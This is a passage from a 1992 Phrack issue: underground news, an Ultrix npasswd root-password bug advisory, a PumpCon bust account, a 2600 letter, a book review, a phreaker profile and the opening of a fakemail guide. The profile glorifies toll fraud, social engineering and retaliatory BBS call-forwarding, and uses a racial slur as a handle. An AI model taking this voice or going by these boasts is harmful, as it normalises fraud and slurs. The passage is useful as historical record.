  833. This event was photographed and videotaped by EGATOBAS Productions, to preserve
  834. this landmark in history.  And now you can witness the event.  For a limited
  835. time we are offering a 11" x 17" full color poster of the Jolly Roger Pirate
  836. flag flying high over AT&T, with the AT&T logo in plain view, with the caption;
  837. "WE CAME, WE SAW, WE CONQUERED."  These are $5.50 each and are laminated.
  838.  
  839. Also available, by request is a 20" x 30" full color photograph, and a cotton
  840. T-shirt with the same full color picture on the front, for $20 each.
  841.  
  842. If you are interested in purchasing any of the above items, simply send check
  843. or money order for the amount to:
  844.  
  845. CyberPunk System
  846. P.O. Box 771027
  847. Wichita, KS  67277-1072
  848.  
  849. A GIF of this is also available from CyberPunk System, 1:291/19, 23:316/0,
  850. 72:708/316, 69:2316/0.  FREQ magicname PIRATE
  851.  
  852. Any questions, send them to Legacy@cpu.cyberpnk1.sai.com
  853.  
  854. _______________________________________________________________________________
  855.  
  856.  Ultrix 4.2 Bug
  857.  ~~~~~~~~~~~~~~
  858.  By Krynn
  859.  
  860. A bug was discovered in Ultrix 4.2 upgrade version.  It involves npasswd, and
  861. root.  It is quite simple, and a patch/fix is available.  Here is a description
  862. of the hole:
  863.  
  864. Sys Admin's username:  mradmin
  865. Any user's username :  mruser
  866.  
  867. Okay, mruser has forgotten his password, which isn't good.  Mruser goes to
  868. mradmin and asks mradmin to change his password to newpass.  Mradmin does so.
  869.  
  870. Mradmin now will su to root, and npasswd mruser.  He will enter mruser's new
  871. password, newpasswd.  It will appear in the /etc/passwd that mruser's password
  872. is a "*" (shadowed), and that it has been changed, but it hasn't.
  873.  
  874. The password changed was root's, meaning root's password is now newuser.
  875.  
  876. A fix is available via anonymous ftp at:
  877.  
  878. black.ox.ac.uk /src/npasswd.enhanced.shar.Z
  879.  
  880. The original is there as /src/npasswd jpl.tar.Z
  881. _______________________________________________________________________________
  882.  
  883.  PumpCon Hosed                                                 November 5, 1992
  884.  ~~~~~~~~~~~~~
  885.  by Phil "The Outlander"
  886.  
  887. PumpCon '92 was held this past weekend at the Westchester Courtyard by
  888. Marriott, and was shut down in spades.
  889.  
  890. It began like any typical hacker/phreak/cyberpunk's convention, with lots of
  891. beer, lots of shooting the bull, and lots of people from around the country,
  892. except that the guests got sloppy, stupid, noisy, and overconfident.
  893.  
  894. The manager of the hotel, accompanied by three town of Greenborough police
  895. officers, entered the room at approximately 10pm on Saturday.  The manager had
  896. received complaints about noise and vandalism from some of the hotel's other
  897. guests.  She claims to have tried to call the room several times before
  898. physically entering, but the room's telephone line was consistently busy.
  899.  
  900. The police officers noticed the multiple open (and empty) beer bottles
  901. scattered around the room and were gearing up to make some arrests for
  902. "Unlawful Possession of Alcoholic Beverages by Underage Persons" when one of
  903. the policemen spotted an Amiga, connected to a US Robotics modem, which was in
  904. turn connected to the suite's phone line.  The "stolen" calling card was all
  905. the probable cause necessary to upgrade the charges to "Wire Fraud."
  906.  
  907. Everyone in the suite was detained for questioning.  Standard investigation
  908. procedure was followed.  The entire case was handled by local authorities,
  909. including the Westchester County DA.  To my knowledge, the FBI and Bell
  910. Security people were not called in (or if they were, it was after I was
  911. released).
  912.  
  913. Each detainee was body-searched for diskettes, hand-written notes about credit
  914. and computer services, autodialers, and the like.  The suite where PumpCon had
  915. taken place was also searched.  Hardware seized includes at least two Amigas
  916. with monitors, modems, and diskettes, and one AT&T dumb terminal with modem.
  917.  
  918. Each of the detainees was interviewed in turn.  Just before dawn on the morning
  919. of Sunday, November 1st, the police began making the actual arrests.  Four to
  920. eight people were arrested and taken to the local jail.
  921.  
  922. The rest of the detainees were released with no charges or arrests filed.
  923.  
  924. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  925.  
  926. And now on a personal note to anybody who is new to the world of hacking:
  927.  
  928. Many of the attendees to PumpCon '92 were just like me.  I was aware of the
  929. possible consequences of an arrest, but the full enormity of the possibilities
  930. hadn't sunk in.  Getting busted can really ruin your life, and I am unwilling
  931. to sacrifice my liberty and get a criminal record just for the thrill of
  932. hanging out with the "eleet."
  933.  
  934. I was personally terrified out of my skull and went right off any dreams I had
  935. of being some kind of big-time cyberpunk.  The law had us outgunned ten to one
  936. (literally and figuratively) and I as I write this on Monday night I still
  937. haven't stopped shaking.
  938.  
  939. To anyone who hasn't considered what it would be like to get seriously busted,
  940. I want you to try and picture the scene that night, and comes the dawn, a lot
  941. of the people you were partying with just twelve hours earlier are carted away
  942. in handcuffs to face an uncertain future.
  943.  
  944. The attendees of PumpCon, including myself and with few exceptions, were utter
  945. and complete fools.  They thought that they could act like jerks, bust up the
  946. hotel, and phreak off the room lines without bringing down the heat like a jet
  947. of molten lava.  They thought they were too smart to get caught.  They thought
  948. that they were immortal.  They thought wrong, and now some of them are going to
  949. pay for it.
  950.  
  951. I got lucky.  I was released, and I learned some invaluable lessons.
  952.  
  953. I can't stress enough to anybody out there who is treating the state of the
  954. Hack like it's a big game:  You aren't going to get your marbles back when the
  955. night is over.  The stakes are real.  Ask yourself if you can deal with the
  956. possibilities of ruining your life before it's even begun.
  957.  
  958. Everyone must make their own decision.  You are only given this one chance to
  959. bail out now; any others that come along are blessings from on high.
  960.  
  961. If you do decide to live in the computer underground, I can only offer this
  962. advice:  Cover your a$$.  Do not act foolishly.  Do not associate with fools.
  963. Remember that you are not immortal, and that ultimately there are no safety
  964. nets.  Intelligence can't always save you.  Do not, in your arrogance, believe
  965. that it will.  My time as a cyberpunk has been short and undistinguished but it
  966. has taught me this much.
  967.  
  968. I'm not saying that you should not become a hacker.  If that is truly your
  969. wish, then I'm not one to stop you.  I'm just warning you that when the fall
  970. comes, it can come hard, and there's nobody who can help you when you've gone
  971. far enough past the line.
  972.  
  973.      Phil "The Outlander"
  974. _______________________________________________________________________________
  975.  
  976.  2600 Meeting Disrupted by Law Enforcement                    December 12, 1992
  977.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  978.  by Emmanuel Goldstein (Editor of 2600 Magazine)
  979.  
  980. The following is a letter I wrote to the Washington Post in response to their
  981. article about the incidents at the Pentagon City Mall on November 6, entitled,
  982. "Hackers Allege Harassment at Mall" (dated November 13, page A1).  Their
  983. article failed to focus on the startling revelation of federal government
  984. involvement and the ominous implications of such an action.  The article also
  985. does little to lessen the near hysteria that is pumped into the general public
  986. every time the word "hacker" is mentioned.
  987.  
  988. Let us take a good look at what has been confirmed so far.  A group of computer
  989. hackers gathered at a local mall as they do once a month.  Similar meetings
  990. have been going on in other cities for years without incident.  This gathering
  991. was not for the purposes of causing trouble and nobody has accused the hackers
  992. of doing anything wrong.  Rather, the gathering was simply a place to meet and
  993. socialize.  This is what people seem to do in food courts and it was the
  994. hackers' intention to do nothing more.
  995.  
  996. When mall security personnel surrounded the group and demanded that they all
  997. submit to a search, it became very clear that something bizarre was happening.
  998. Those who resisted were threatened with arrest.  Everyone's names were written
  999. down, everyone's bags gone through.  One person attempted to write down the
  1000. badge numbers of the people doing this.  The list was snatched out of his hand
  1001. and ripped to pieces.  Another hacker attempted to catch the episode on film.
  1002. He was apprehended and the film was ripped from his camera.  School books,
  1003. notepads, and personal property were seized.  Much of it has still not been
  1004. returned.  The group was held for close to an  hour and then told to stay out
  1005. of the mall or be arrested.
  1006.  
  1007. This kind of treatment is enough to shock most people, particularly when
  1008. coupled with the overwhelming evidence and eyewitness accounts confirming no
  1009. unusual or disruptive behavior on the part of the group.  It is against
  1010. everything that our society stands for to subject people to random searches and
  1011. official intimidation, simply because of their interests, lifestyles, or the
  1012. way they look.  This occurrence alone would warrant condemnation of a blatant
  1013. abuse of power.  But the story doesn't end there.
  1014.  
  1015. The harassment of the hackers by the mall police was only the most obvious
  1016. element.  Where the most attention should be focused at this point is on the
  1017. United States Secret Service which, according to Al Johnson, head of mall
  1018. security, "ramrodded" the whole thing.  Other media sources, such as the
  1019. industry newsletter Communications Daily, were told by Johnson that the Secret
  1020. Service was all over the mall that day and that they had, in effect, ordered
  1021. the harassment.  Arlington police confirm that the Secret Service was at the
  1022. mall that day.
  1023.  
  1024. It is understood that the Secret Service, as a branch of the Treasury
  1025. Department, investigates credit card fraud.  Credit card fraud, in turn, can be
  1026. accomplished through computer crime.  Some computer hackers could conceivably
  1027. use their talents to accomplish computer crime.  Thus we arrive at the current
  1028. Secret Service policy, which appears to treat everybody in the hacker world as
  1029. if they were a proven counterfeiter.  This feeling is grounded in
  1030. misperceptions and an apprehension that borders on panic.  Not helping the
  1031. situation any is the ever-present generation gap -- most hackers are young and
  1032. most government officials are not.
  1033.  
  1034. Apart from being disturbed by the gross generalizations that comprise their
  1035. policy, it seems a tremendous waste of resources to use our Secret Service to
  1036. spy on public gatherings in shopping malls.  It seems certain to be a violation
  1037. of our rights to allow them to disrupt these meetings and intimidate the
  1038. participants, albeit indirectly.  Like any other governmental agency, it is
  1039. expected that the Secret Service follow the rules and not violate the
  1040. constitutional rights of citizens.
  1041.  
  1042. If such actions are not publicly condemned, we will in effect be granting a
  1043. license for their continuance and expansion.  The incident above sounds like
  1044. something from the darkest days of the Soviet Union when human rights activists
  1045. were intimidated by government agents and their subordinates.  True, these are
  1046. technology enthusiasts, not activists.  But who they are is not the issue.  We
  1047. cannot permit governmental abuse of any person or group simply because they may
  1048. be controversial.
  1049.  
  1050. Why do hackers evoke such controversy?  Their mere presence is an inconvenience
  1051. to those who want so desperately to believe the emperor is wearing clothes.
  1052. Hackers have a tendency of pointing out the obvious inadequacies of the
  1053. computer systems we entrust with such a large and growing part of our lives.
  1054. Many people don't want to be told how flimsily these various systems are held
  1055. together and how so much personal data is readily available to so many.
  1056. Because hackers manage to demonstrate how simple it is to get and manipulate
  1057. this information, they are held fully responsible for the security holes
  1058. themselves.
  1059.  
  1060. But, contrary to most media perceptions, hackers have very little interest in
  1061. looking at other people's personal files.  Ironically, they tend to value
  1062. privacy more than the rest of us because they know firsthand how vulnerable it
  1063. is.  Over the years, hackers have gone to the media to expose weaknesses in our
  1064. credit reporting agencies, the grading system for New York City public schools,
  1065. military computer systems, voice mail systems, and even commonly used push
  1066. button locks that give a false sense of security.  Not one of these examples
  1067. resulted in significant media attention and, consequently, adequate security
  1068. was either delayed or not implemented at all.
  1069.  
  1070. Conversely, whenever the government chooses to prosecute a hacker, most media
  1071. attention focuses on what the hacker "could have done" had he been malicious.
  1072. This reinforces the inaccurate depiction of hackers as the major threat to our
  1073. privacy and completely ignores the failure of the system itself.
  1074.  
  1075. By coming out publicly and meeting with other hackers and non-hackers in an
  1076. open atmosphere, we have dispelled many of the myths and helped foster an
  1077. environment conducive to learning.  But the message we received at the Pentagon
  1078. City Mall tells us to hide, be secretive, and not trust anybody.  Perhaps
  1079. that's how the Secret Service wants hackers to behave.  But we are not
  1080. criminals and we refuse to act as such simply because we are perceived that way
  1081. by uninformed bureaucrats.
  1082.  
  1083. Regardless of our individual outlooks on the hacker issue, we should be
  1084. outraged and extremely frightened to see the Secret Service act as they did.
  1085. Whether or not we believe that hackers are decent people, we must agree that
  1086. they are entitled to the same constitutional freedoms the rest of us take for
  1087. granted.  Any less is tantamount to a very dangerous and ill-advised precedent.
  1088.  
  1089.      Emmanuel Goldstein
  1090.      Editor, 2600 Magazine -- The Hacker Quarterly (516)751-2600
  1091.  
  1092. (NOTE: 2600 Magazine coordinates monthly hacker meetings throughout the
  1093.        country.)
  1094. _______________________________________________________________________________
  1095.  
  1096.  Two New Hardcovers                                           November 24, 1992
  1097.  ~~~~~~~~~~~~~~~~~~
  1098.  by Alan J. Rothman (New York Law Journal)(Page 5)
  1099.  
  1100. During the opening sequence of the classic English television series "The
  1101. Prisoner," the lead character known only as Number 6 (brilliantly played by
  1102. Patrick McGoohan) is abducted and taken to a secret location called "The
  1103. Village."  He desperately pleads with his captors "What do you want?"  Their
  1104. grim response is "Information."  Through 17 thrilling episodes, his kidnappers
  1105. staged elaborate high-tech ruses to find out why he quit work as a spy.
  1106.  
  1107. Had this story been set in the 1990s rather than the 1960s, all The Village's
  1108. proprietors would have needed was a PC and a modem.  They could have assembled
  1109. a composite of Number 6's movements by cross-referencing records from any of
  1110. the commercial data bases containing the details of nearly everyone's daily
  1111. activities.  Then with a bit of ingenuity, they could have tried to steal even
  1112. more information by hacking into other restricted data systems.
  1113.  
  1114. No longer fiction, but common fact, the billowing growth in the computers and
  1115. telecommunications networks everywhere is generating urgent legal issues
  1116. regarding the content, usage and ownership of the data coursing through them.
  1117. Dilemmas have also surfaced concerning the responsibilities of the businesses
  1118. which gather, sift and repackage such information.  Indeed, a critical juncture
  1119. has now been reached where the basic constitutional rights of privacy and
  1120. expression are colliding with the ever-expanding reach of modern technology.
  1121.  
  1122. Two well-crafted books have recently been published which together frame the
  1123. spectrum of relevant individual rights issues in these areas with uncanny
  1124. symmetry.  Fortunately, neither degenerates into a "computers are bad"
  1125. jeremiad.  Rather, they portray an appropriate balance between the virtues of
  1126. computerization and disturbing cases of technological misuse for wrongful
  1127. commercial and governmental ends.
  1128.  
  1129. Presenting array of new forms of electronic encroachment on personal privacy is
  1130. Jeffrey Rothfeder's alarming new book, "Privacy for Sale: How Computerization
  1131. Has Made Everyone's Private Life an Open Secret" (Simon & Schuster, 224 pages,
  1132. $22).  He offers the chilling thesis that anyone can find out nearly anything
  1133. regarding anybody and there is nowhere left to hide.  He convincingly states
  1134. his case in a concise and insightful exploration of the trends and abuses in
  1135. the mass processing of personal data.
  1136.  
  1137. The fascinating mechanics of how and where information about virtually every
  1138. aspect of our lives is gathered and then computerized are extensively
  1139. described.  The most productive fonts include medical records, credit
  1140. histories, mortgage applications, subscription lists, phone records, driver's
  1141. licenses and insurance forms.  Yet notwithstanding the legitimate commercial
  1142. and regulatory reasons for providing these facts, the author carefully
  1143. documents another more deeply hidden and troubling consequence of volunteering
  1144. such information: It is constantly resold, combined with other sources and
  1145. reused without your knowledge or permission for purposes entirely different
  1146. from those you first intended.
  1147.  
  1148. Mr. Rothfeder alleges the most perilous result of these activities is the
  1149. growing and highly organized sales, integration and cross-matching of
  1150. databases.  Businesses and government entities now have sophisticated software
  1151. to generate complex demographic profiles about individuals, populations and
  1152. geographic areas.  In turn, these computer-generated syntheses are increasingly
  1153. used for invasive and discriminatory purposes.
  1154.  
  1155. Numerous examples of such misuse are cited, ranging from slightly annoying to
  1156. purely horrifying.  The astonishing breadth of this roster includes the sale of
  1157. driver's license information with height weight specifications to clothes
  1158. marketers for tall men and thin women, purchases of credit histories and
  1159. workmen's compensation claims reports by prospective employers who believe this
  1160. material is indicative of a job applicant's character, and the creation of
  1161. "propensity files" by federal agencies to identify people who have not
  1162. committed any offense but might likely be criminals.
  1163.  
  1164. Two additional problems pervade the trafficking of intimate information.
  1165. First, there is little or no federal legislation to effectively protect people
  1166. from certain problems presented in the book.  For example, the release of
  1167. medical records thought to be "confidential" is virtually unprotected.
  1168.  
  1169. Second, it can be extremely difficult to have false entries corrected before
  1170. they have a ripple effect on your other data.  Beyond the common tales of
  1171. frustration at clearing up a faulty credit report, Mr. Rothfeder relates the
  1172. case of a man denied any health insurance because his medical records contained
  1173. an erroneous report he was HIV positive.
  1174.  
  1175.  
  1176. JOURNEY IN CYBERSPACE
  1177.  
  1178. Turning to a much more accurate account, author Bruce Sterling takes readers
  1179. into the ethereal realm of "cyberspace" where computers, networks, and
  1180. electronic bulletin boards systems (BBS) are linked together by phone.  In his
  1181. first non-fiction work, "The Hacker Crackdown: Law and Disorder on the
  1182. Electronic Frontier" (Bantam, 328 pages, $23), he chronicles the U.S.
  1183. government's highly visible efforts in 1990 to prosecute "hackers" it suspected
  1184. of committing crimes by PC and modem.  However, Mr. Sterling distinguishes this
  1185. term as being more about active computer enthusiasts, most of whom have never
  1186. committed any wrongdoing.  The writer's other credits include some highly
  1187. regarded "cyberpunk" science fiction, where computer technology is central to
  1188. the plots and characters.
  1189.  
  1190. The "crackdown" detailed by the author began with the crash of AT&T's long-
  1191. distance phone system on January 15, 1990.  Although it has never been proven
  1192. that hackers were responsible, this event served as the final catalyst to spur
  1193. federal law enforcement agencies into concerted action against a suspected
  1194. underground of computer criminals.  A variety of counter-operations were
  1195. executed.  Most notable was Operation Sundevil the following May when agents
  1196. around the country seized 42 computer systems, 23,000 diskettes, and halted 25
  1197. BBS's where the government believed hackers were exchanging tips of the trade.
  1198.  
  1199. Some of the government's resulting prosecutions through their nationwide
  1200. efforts were moderately successful. However, the book's dramatic centerpiece is
  1201. the trial of Craig Neidorf (a.k.a. Knight Lightning).  Mr. Neidorf was a
  1202. contributor to Phrack, an electronic magazine catering to hackers, available on
  1203. various BBS's.
  1204.  
  1205. In January 1989, another hacker named "Prophet" transmitted a document he
  1206. pilfered from BellSouth's computers regarding the 911 emergency system to
  1207. Neidorf.  Together they edited the text, which Neidorf then published in
  1208. Phrack.  In July 1990, he was placed on trial for federal charges of entering a
  1209. fraudulent scheme with Prophet to steal this document.  The government alleged
  1210. it was worth $79,499 and that its publication threatened emergency operations.
  1211. To the prosecutor's dismay, the case was dropped when the defense proved the
  1212. same material was publicly available for only $13.
  1213.  
  1214. With insight and style, Mr. Sterling uses this and other events to cast
  1215. intriguing new spins on applicable civil liberties issues.
  1216.  
  1217. Are the constitutional guarantees of freedom of expression and assembly fully
  1218. extended to BBS dialogs and gatherings?  What degree of privacy can be expected
  1219. for personal data on systems which may be subject to surreptitious entry?  Are
  1220. hackers really breaking any laws when merely exploring new systems?  Is posting
  1221. a message or document on a BBS considered a "publication"?  Should all BBS's be
  1222. monitored just because of their potential for illegal activity?  What are the
  1223. responsibilities of BBS operators for the contents of, and access to, their
  1224. systems?
  1225.  
  1226. The efforts of Mitchell Kapor, the co-developer of Lotus 123 and now chairman
  1227. of ONtechnology, are depicted as a direct response to such issues raised by the
  1228. crackdown.  Mr. Kapor assembled a prominent group of fellow computer
  1229. professionals to establish the Electronic Frontier Foundation (EFF), dedicated
  1230. to education and lobbying for free speech and expression in electronic media.
  1231. As well, EFF has provided support to Craig Neidorf and others they consider
  1232. wrongly charged with computer crime.
  1233.  
  1234. Weighty legal matters aside, the author also embellishes his story with some
  1235. colorful hacker lore.  These denizens of cyberspace are mostly young men in
  1236. their late teens or early twenties, often fueled by junk food and propelled by
  1237. macho.  Perhaps their most amusing trait is the monikers they adopt --
  1238. Bloodaxe, Shadowhawk, and of course, Phiber Optik.
  1239.  
  1240. Someone else, a non-hacker involuntary given the pseudonym "Number 6," knew his
  1241. every act was continually being monitored and recorded against his will.  As a
  1242. manifestation of resistance to this relentless surveillance, he often bid
  1243. farewell to other citizens of the Village with a sarcastic "Be seeing you."
  1244. Today, the offerings of authors Rothfeder and Sterling provide a resounding
  1245. "And you" as a form of rejoinder (often uttered by The Village's citizens as
  1246. well), to publicize the ironic diversity threats wrought by information
  1247. technology.
  1248.  
  1249. Number 6 cleverly managed to escape his fictional captivity in The Village
  1250. during the final (and mind-boggling) episode of The Prisoner.  However, based
  1251. on the compelling evidence presented in these two books, the protection of
  1252. individual rights in the reality of today's evolving "global village" of
  1253. computer networks and telecommunications may not be so neatly resolved.
  1254. _______________________________________________________________________________
  1255.  
  1256.                                 ==Phrack Inc.==
  1257.  
  1258.                    Volume Four, Issue Forty-One, File 3 of 13
  1259.  
  1260.                               ==Phrack Pro-Phile==
  1261.  
  1262.                           Created by Taran King (1986)
  1263.  
  1264. _______________________________________________________________________________
  1265.  
  1266.      Welcome to Phrack Pro-Phile.  Phrack Pro-Phile is created to bring info to
  1267. you, the users, about old or highly important/controversial people.  This
  1268. month, we bring to you certainly one of the most controversial people (and
  1269. handles) to ever emerge in the computer underground...
  1270.  
  1271.                                   Supernigger
  1272.                                   ~~~~~~~~~~~
  1273. _______________________________________________________________________________
  1274.  
  1275.  Personal
  1276.  ~~~~~~~~
  1277.            Handle:  Supernigger
  1278.          Call him:  SN
  1279.     Date of Birth:  Years ago
  1280.               Age:  Getting along in the years.
  1281.            Height:  Medium
  1282.            Weight:  Medium
  1283.   Computers owned:  Commodore Vic-20, C64, Amiga, 386 Compatible
  1284.  
  1285.      How did this handle originate?  Back in 1985, I had blueboxed to a bridge.
  1286. Someone on there, for some reason, decided that he didn't like me, and shouted,
  1287. "Get off, nigger!"  He then proceeded to knock me off with a 2600 Hz tone.  I
  1288. immediately called back with something "un-2600 hz-able" and, when he shouted,
  1289. "Get off nigger!" and blew 2600 hz, I then said, "I'm SUPERnigger, you can't
  1290. knock me off, I've got the POWER!!"  Fun, eh?
  1291.  
  1292.  
  1293.  How I Got Started
  1294.  ~~~~~~~~~~~~~~~~~
  1295.      Back in '82 or '83, I got a wonderful computer called a Commodore Vic-20.
  1296. With that, I wrote a few irrelevant programs and played "Gorf!" a lot.  Then, a
  1297. friend suggested that I get a Commodore C-64 and disk drive for all the RAD
  1298. WhErEz! it had.
  1299.  
  1300.        Needless to say, I was not disappointed.  Then a friend showed me a
  1301. 5-digit number you could put in after calling an access number, and it would
  1302. put a call through for you!  Imagine that!  This, I thought, was the key to
  1303. UNLIMITED WARES!
  1304.  
  1305.      Then, the new ware scene became tiresome and boring REAL quick.  I had
  1306. them all.  New ones.  Old ones.  Middle-aged ones.  I had wares coming out of
  1307. my ass.  Just when I was about to drop out of the scene, I saw a number posted
  1308. on a board for InterCHAT (201), a multi-line chat system.
  1309.  
  1310.      That's where the cavalcade of fun and interesting endeavors began.  That's
  1311. where I met Sharp Remob, Lord_foul (DP), Dark Wanderer and other members of
  1312. DPAK.
  1313.  
  1314.      Speaking of DPAK, the group was created when we found a glitch in the MCI
  1315. access # that allowed any 14-digit code to work.  We then made up the joke,
  1316. "Today at 2:00 PM, DPAK Agents cornered an MCI official and said, 'You WILL
  1317. give these people free calls!'" and proceeded to tell people about the glitch
  1318. ("DPAK" came from Mad Hacker 312, who, when asked about obtaining non-published
  1319. numbers, said, "Oh, you'd have to be a DPAK Agent to get that.").
  1320.  
  1321.      After that, DPAK was tracing people before Caller ID came out, finding and
  1322. creating bridges, setting up an 800 # for InterCHAT (actually 2 if you were
  1323. quick enough to catch the second one), putting out Sharp Remob's Social
  1324. Engineering file, and other things that I had better not mention (I would go
  1325. on, but I think I might frighten you.).
  1326.  
  1327.      I would have to say that I feel negatively toward "elite posers," people
  1328. who claim to know things with the sole purpose of trying to seem "cool."  These
  1329. are the people you see boasting about how long they have been around (which is
  1330. irrelevant), spurting out random acronyms when they have no idea how they are
  1331. actually used, and trying to make something complicated and mysterious out of
  1332. something mundane and simple.  For example:  "Hey dude, watch out, I may be
  1333. listening in on your line right now with a DAMT," or "Oh, I'll just use the DRT
  1334. trunk multiplexor to do a Random Interphase-seizure of the tandemized trunk."
  1335. (Barf!)
  1336.  
  1337.      Also, I think this government crackdown really sucks.  What sucks is the
  1338. fact that the government is going after big NAMES instead of big -CRIMES-.
  1339. Rather than stopping crimes, they just want to "show who's boss."  A lot of
  1340. innocent lives are being ruined.  In fact, after this issue of Phrack comes
  1341. out, I plan to lay VERY low because they will probably want to get me now that
  1342. my handle was in a phreak/hack publication.
  1343.  
  1344.  
  1345.  Interests
  1346.  ~~~~~~~~~
  1347.  
  1348.               Women:  Fast
  1349.                Cars:  Fast (VWs)
  1350.                Food:  Fast
  1351.               Music:  All kinds (Rap, Rock, Metal, you name it)
  1352. Favorite performers:  2 Live Crew
  1353.     Favorite author:  Lord Digital (the father of ELITE!ness)
  1354.       Favorite Book:  Nat!onal Enl!ghtener
  1355.  
  1356.  
  1357.  Most Memorable Experiences
  1358.  ~~~~~~~~~~~~~~~~~~~~~~~~~~
  1359.      "It works!  It works!!" -- when the 800 # for InterCHAT actually worked.
  1360. If you called it, you remember.  That took a lot of work...
  1361.  
  1362.      Also, at one point in time, every chat system in New Jersey was forwarded
  1363. to InterCHAT..  That was truly hilarious.  I strongly suggest, at this point,
  1364. that everyone refrain from attempting these things.  The consequences are a bit
  1365. more serious now.  But if you must, be VERY very careful.
  1366.  
  1367.      ...And, I would like to take this opportunity to clear up the "Free World
  1368. II Incident" and other vague and unclear statements chronicled in Phrack 28.
  1369. First of all, I -DID NOT- crash Black Ice BBS.  In fact, some hick from Texas
  1370. already stated to me that he wrote my name on the BBS when it was crashed.  The
  1371. same hick tends to lie and spread rumors a lot, so I don't actually know if it
  1372. was him that wrote my name.  Suffice to say that I didn't crash it.
  1373.  
  1374.      Secondly, and most important, Free World II BBS was forwarded to InterCHAT
  1375. because Major Havoc was a complete and total ASSHOLE.
  1376.  
  1377.      I called his system and applied for access.  When I tried to get back on,
  1378. I found that my application had been deleted without so much as a notification,
  1379. so I thought that the BBS hadn't saved it correctly and applied again.  I found
  1380. the BBS hadn't saved it correctly a second time, and when I tried to fill out
  1381. the application once more, Major Havoc broke in and typed things like "Get the
  1382. fuck off here" and "Hang the fuck up."  I typed "Fine, have it your way" and
  1383. proceeded to forward his BBS # to InterCHAT.  You can't just treat people like
  1384. that and expect nothing to happen.
  1385.  
  1386.      The opening message on InterCHAT said:  "Until Major Havoc learns the
  1387. meaning of the word TACT (dealing with people in a non-offensive manner), his
  1388. BBS has been put to better use."
  1389.  
  1390.      (I had called the BBS in the first place to try to clear up wild rumors
  1391. that The Blade had said were being tossed about on there).
  1392.  
  1393.      I hope this has cleared things up.
  1394.  
  1395.  
  1396.  Some People To Mention
  1397.  ~~~~~~~~~~~~~~~~~~~~~~
  1398.  
  1399. Sharp Remob :       He showed me the wonders of Social Engineering.  He is
  1400.                     making the big dollars now.
  1401.  
  1402. Lord_foul :         I never realized how many people he was in contact with.
  1403.                     Some pretty heavy hitters.  He never let on how much he
  1404.                     knew.
  1405.  
  1406. Applehead :         The best DJ in the phreak/hack world.  Truly, in mixing
  1407.                     records, no one is his equal.  Seems to be able to
  1408.                     mesmerize phone company employees into doing his bidding as
  1409.                     well.  Could these two things be related?
  1410.  
  1411. Meat Puppet :       "Money for nuthin, EVERYTHING for free."  Why anyone would
  1412.                     want 800 watts in their car I will never know.
  1413.  
  1414. Lung C00kiez :      He had the best conference ideas, like Want-Ad Fun and
  1415.                     Operator Frenzy.
  1416.  
  1417. *DETH*-2-*J00Z* :   So much for political correctness.  First person I know to
  1418.                     theorize how to trace people before Caller ID came out.
  1419.  
  1420. Dark Wanderer :     Works for Sun Microsystems now.  One of the few hackers I
  1421.                     know that has a technical computer-oriented career.
  1422.  
  1423. Krak Dealer :       Takes consciousness-altering to the level of an art form.
  1424.  
  1425. Squashed Pumpkin :  The enforcer.
  1426.  
  1427. DeeDee :            The only cool bridge chick.
  1428.  
  1429. Dr. Mike :          Cool guy when he's not threatening his girlfriend with a
  1430.                     knife.
  1431.  
  1432. Gatsby :            Gets the award for quick learner.
  1433.  
  1434. orpheus :           One of the true devotees of InterCHAT, and one of the few
  1435.                     people I know who is actually interested in HP-3000.
  1436.  
  1437. The whole InterCHAT crowd...  Made modeming fun.
  1438.  
  1439.      I should also mention a group of NYC individuals at this time.  I would
  1440. mention their names, but certain legal situations preclude that.  They showed
  1441. me what someone can REALLY do with an in-depth understanding of many systems.
  1442.  
  1443.      Suffice to say that they are the creme de la creme, probably the only
  1444. group up to par with DPAK.
  1445.  
  1446.      Oh, and I cannot, I MUST NOT forget to mention The Blade, who is truly a
  1447. legend in his own mind.
  1448.  
  1449.  
  1450.  The Future
  1451.  ~~~~~~~~~~
  1452.      I see the future for hacking/phreaking as pretty bleak.  Big Brother is
  1453. watching.  System Administrators are finally realizing that it is better to
  1454. make your system impenetrable than to prosecute kids (I wish the government
  1455. would realize this).  If you combine these two things, there is not much to
  1456. look forward to.
  1457.  
  1458.  In Closing...
  1459.  ~~~~~~~~~~~~~
  1460.      As for the standard Pro-Phile question (are most of 
  1461. the phreaks and
  1462. hackers that I've met computer geeks?), I have not met any phreakers or
  1463. hackers, so I can't say if they are geeks or not.  From phone conversations,
  1464. some seem like geeks, some don't.
  1465. _______________________________________________________________________________
  1466.  
  1467.                                 ==Phrack Inc.==
  1468.  
  1469.                    Volume Four, Issue Forty-One, File 4 of 13
  1470.  
  1471.                                Network Miscellany
  1472.             *******************************************************
  1473.            <              The POWER of Electronic Mail             >
  1474.             *******************************************************
  1475.                          Compiled from Internet Sources
  1476.  
  1477.                                 by The Racketeer
  1478.                               of The Hellfire Club
  1479.  
  1480.                     Network Miscellany created by Taran King
  1481.  
  1482.  
  1483.      First of all, this guide is more than using fakemail.  It literally
  1484. explains the interfaces used with SMTP in detail enough that you should gain a
  1485. stronger awareness of what is going on across the multitude of networks which
  1486. make up the worldwide e-mail connections.  It also contains my usual crude
  1487. remarks and grim hacker humor (assuming it hasn't again been edited out, but
  1488. I'm somewhat proud of the fact that Phrack heavily edited my "language" in last
  1489. issue's article.  Oh well.).
  1490.  
  1491.      There are two objectives in this file:  first, I will attempt to show that
  1492. by using fakemail and SMTP, you can cause an amazing number of useful, hacker
  1493. related stunts; second, I shall attempt to be the first hacker to ever send a
  1494. piece of electronic mail completely around the world, ushering in a new age of
  1495. computerdom!
  1496.  
  1497.      I suggest that, unless you don't want everyone lynching you, don't try to
  1498. fuck up anything that can't be repaired offhand.  I've experimented with
  1499. fakemail beyond this article and the results were both impressive and
  1500. disastrous.  Therefore, let's examine risks first, and then go onto the good
  1501. stuff.  Basic philosophy -- use your brain if you've got one.
  1502.  
  1503.  
  1504. RISKS:
  1505.  
  1506.      Getting caught doing this can be labeled as computer vandalism; it may
  1507. violate trespassing laws; it probably violates hundreds of NFS, Bitnet and
  1508. private company guidelines and ethics policies; and finally, it will no doubt
  1509. piss someone off to the point of intended revenge.
  1510.  
  1511.      Networks have fairly good tracing abilities.  If you are logged, your host
  1512. may be disconnected due to disciplinary referral by network authorities (I
  1513. don't think this has happened yet).  Your account will almost definitely be
  1514. taken away, and if you are a member of the source or target computer's
  1515. company/organization, you can expect to face some sort of political shit that
  1516. could result in suspension, expulsion, firing, or otherwise getting the short
  1517. end of the stick for awhile.
  1518.  
